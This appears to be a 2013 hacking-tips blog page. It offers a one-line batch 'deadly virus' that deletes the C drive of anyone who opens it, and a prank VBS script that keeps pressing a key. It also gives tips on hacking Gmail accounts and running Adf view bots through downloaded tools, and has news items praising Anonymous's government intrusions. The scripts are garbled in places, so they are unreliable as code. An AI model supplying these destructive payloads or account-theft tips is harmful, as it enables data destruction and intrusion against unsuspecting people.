Saturday, 16 November 2013

How to hack and edit Xbox games

Just simply plug in your usb and download the program horizon (link below) then u can just edit anything u want in the game.

How to make a deadly virus with notepad

Only 1 step:

Just simply open notepad paste the following below and save it as anything.bat then when someone opens it it will delete everything on there c drive

@Echo off 
Del C:\ *.* |y

Non deadly Virus to prank your friends

Step 1:

Open notepad

Step 2:

Copy and paste the following except u can change the CAPSLOCK part to any button on the keypad u want, once u paste it save it as anything u want .vbs then it will repeatably click that button
Set wshShell =wscript.CreateObject("WScript.Shell"
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"

How to hack facebook likes

Just simply go to then u can auto-like any posts or status' just by the click of a button.

Adf view bot hack

Step 1:

Download the hack (link down the bottom of the page)

Step 2:

Type in the URL u want to be viewed a lot and click add URL then go to the proxy list previously posted on this blog and copy them all then post them in the proxy management section, the change the delay management to 1-2 then click start and watch as your views increase.

Bulldoghacks is searching for admins

Comment if your interested and have an experience in hacking

FBI announced hacks of government computers by Anonymous becoming a widespread problem

Anonymous members secretly hacked into several U.S government computers in multiple agencies stealing sensitive data in a campaign that started a year ago. The FBI warned the american government this week about this becoming a widespread problem that should be addressed, It said the breach affected the U.S. Army, Department of Energy, Department of Health and Human Services, and perhaps many more agencies. The FBI are still gathering information on this campaign by Anonymous although it is thought these cyber crimes will continue.

Anomymous hacker Jeremy Hammond sentenced for 10 years

Jeremy Hammond quoted 'My days of hacking are done'

Hammond denounced his prosecution of 10 years as a vengeful, spiteful act designed to put a chill down other political hacktivists backs. Although even though they are trying Anonymous wont give in to there forceful ways and the potential prison sentences, Anonymous will continue there political hacking to help our modern society.

Where to get hacking tools and generators no surveys

Just go to the site listed below and search what u need then click into one and copy the link (usually mediafire) and paste it then download it.

How to hack someone's gmail account

Only 1 step

Just download the program and fill out everything it requires including the gmail account u want hacked the download link is below.

How to password lock a folder

Only 1 step

Just download one of these 2 free folder lock programs and they'll teach u how to simply lock a folder